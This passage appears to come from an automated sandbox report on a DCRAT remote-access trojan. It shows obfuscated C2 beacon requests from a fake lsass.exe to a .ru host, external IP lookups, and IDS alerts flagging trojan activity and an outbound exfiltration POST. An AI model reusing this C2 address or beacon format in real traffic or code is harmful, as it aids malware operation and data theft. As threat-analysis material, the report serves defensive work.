M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W | unknown | text | 104 b | unknown |
3876 | lsass.exe | GET | 200 | 104.21.2.8:80 | http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&5e79fff15169b7d3a3fa62efdb306b31=d1nIxMTNlhjNlJGNlNTN5ImNzEzYzQDM0ITM1cDMwkDOzUDNzQDMyMGZyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W&4a4a8831cb4723c7f5e3b65ea3eefbf9=d1nIiojI3MWMkBzNjJTYlZTMyIGNmFmMwYTZhNDZ1kTMlRmNykjIsISMzUTZ4YTZiRTZzUTOiZzMxM2M0ADNyETN3ADM5gzM1QzM0AjMjRmMiojIxQTZ5ITM2kTYjVmZzIGMyYWNyQmN2gjZ1MWY3YGNiZjIsICN5EjM3YDN5Q2YwQWNmZTOmVTNyUGOklDNwIWYyYTO0MjZ3IDOwU2NiojI5MmZiNTOhJjY2EDO4ImN5ITZ1EGM4EWN0EzMykTMxQmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJFTNXpFdCNEZ5Z0RkRlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S6FUeaVHbHN2dWdEZUJ0QOhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzZIt0Zvh0UIJkeOVXSElUQCNlVR5URJdXQE5kMwMlTwJ0UL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTtkQ5kGVvFUajxmUINGaSdVUn10MZBHaHNGaKNjUnVEMSdlQDpVeGdkW1Z0RkRlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QClWT6F0QihWNyIGcONzYsplMilnQGl0MBl3YzkzRaVHbyYVavpWS5ZVbWVHbyYVa3NlZpRzVhNnSYp1Q5MlW3lTbjFjVrlkNJNlW1lTblxWMXFGMKNETpFERNdXQE10dJl2Tpd3VZBjTzI2dKNETptmbihWMtNGbkVUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNZRUTwQTeNh3dp5UNFRlT1lEVOl2bqlka5ckYpdXaJZkUrlkNJNVZ5JlbiFTOykVa3lWS1x2RilnVtF1ZR1mYoh3aJZTSpJmdsJjWspkbJNXSpJGc412Ysp0aJZTSTVGMsJTWpdXaJp3YqxkejRVT1FFVNlHNT1ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiI0UjZ5EWNlBTNmdDZ3AzNmJDZzYDMlRGZ3gTZllDZlZmN1kTOkFWOmJiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W | unknown | text | 104 b | unknown |
3876 | lsass.exe | GET | 200 | 104.21.2.8:80 | http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&5e79fff15169b7d3a3fa62efdb306b31=d1nIxMTNlhjNlJGNlNTN5ImNzEzYzQDM0ITM1cDMwkDOzUDNzQDMyMGZyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W&4a4a8831cb4723c7f5e3b65ea3eefbf9=d1nIiojI3MWMkBzNjJTYlZTMyIGNmFmMwYTZhNDZ1kTMlRmNykjIsISMzUTZ4YTZiRTZzUTOiZzMxM2M0ADNyETN3ADM5gzM1QzM0AjMjRmMiojIxQTZ5ITM2kTYjVmZzIGMyYWNyQmN2gjZ1MWY3YGNiZjIsICN5EjM3YDN5Q2YwQWNmZTOmVTNyUGOklDNwIWYyYTO0MjZ3IDOwU2NiojI5MmZiNTOhJjY2EDO4ImN5ITZ1EGM4EWN0EzMykTMxQmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJFTNXpFdCNEZ5Z0RkRlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S6FUeaVHbHN2dWdEZUJ0QOhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzZIt0Zvh0UIJkeOVXSElUQCNlVR5URJdXQE5kMwMlTwJ0UL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTtkQ5kGVvFUajxmUINGaSdVUn10MZBHaHNGaKNjUnVEMSdlQDpVeGdkW1Z0RkRlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QClWT6F0QihWNyIGcONzYsplMilnQGl0MBl3YzkzRaVHbyYVavpWS5ZVbWVHbyYVa3NlZpRzVhNnSYp1Q5MlW3lTbjFjVrlkNJNlW1lTblxWMXFGMKNETpFERNdXQE10dJl2Tpd3VZBjTzI2dKNETptmbihWMtNGbkVUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNZRUTwQTeNh3dp5UNFRlT1lEVOl2bqlka5ckYpdXaJZkUrlkNJNVZ5JlbiFTOykVa3lWS1x2RilnVtF1ZR1mYoh3aJZTSpJmdsJjWspkbJNXSpJGc412Ysp0aJZTSTVGMsJTWpdXaJp3YqxkejRVT1FFVNlHNT1ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiI0UjZ5EWNlBTNmdDZ3AzNmJDZzYDMlRGZ3gTZllDZlZmN1kTOkFWOmJiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W | unknown | text | 104 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
120 | PortwebSaves.exe | 208.95.112.1:80 | ip-api.com | TUT-AS | US | unknown |
3876 | lsass.exe | 208.95.112.1:80 | ip-api.com | TUT-AS | US | unknown |
3876 | lsass.exe | 104.21.2.8:80 | 7777.cllt.nyashteam.ru | CLOUDFLARENET | — | unknown |
Domain | IP | Reputation |
|---|---|---|
ip-api.com |
| shared |
7777.cllt.nyashteam.ru |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
120 | PortwebSaves.exe | Potential Corporate Privacy Violation | AV POLICY Internal Host Retrieving External IP Address (ip-api. com) |
120 | PortwebSaves.exe | Device Retrieving External IP Address Detected | POLICY [ANY.RUN] External Hosting Lookup by ip-api |
120 | PortwebSaves.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
3876 | lsass.exe | Potential Corporate Privacy Violation | AV POLICY Internal Host Retrieving External IP Address (ip-api. com) |
3876 | lsass.exe | Device Retrieving External IP Address Detected | POLICY [ANY.RUN] External Hosting Lookup by ip-api |
3876 | lsass.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
3876 | lsass.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
3876 | lsass.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) |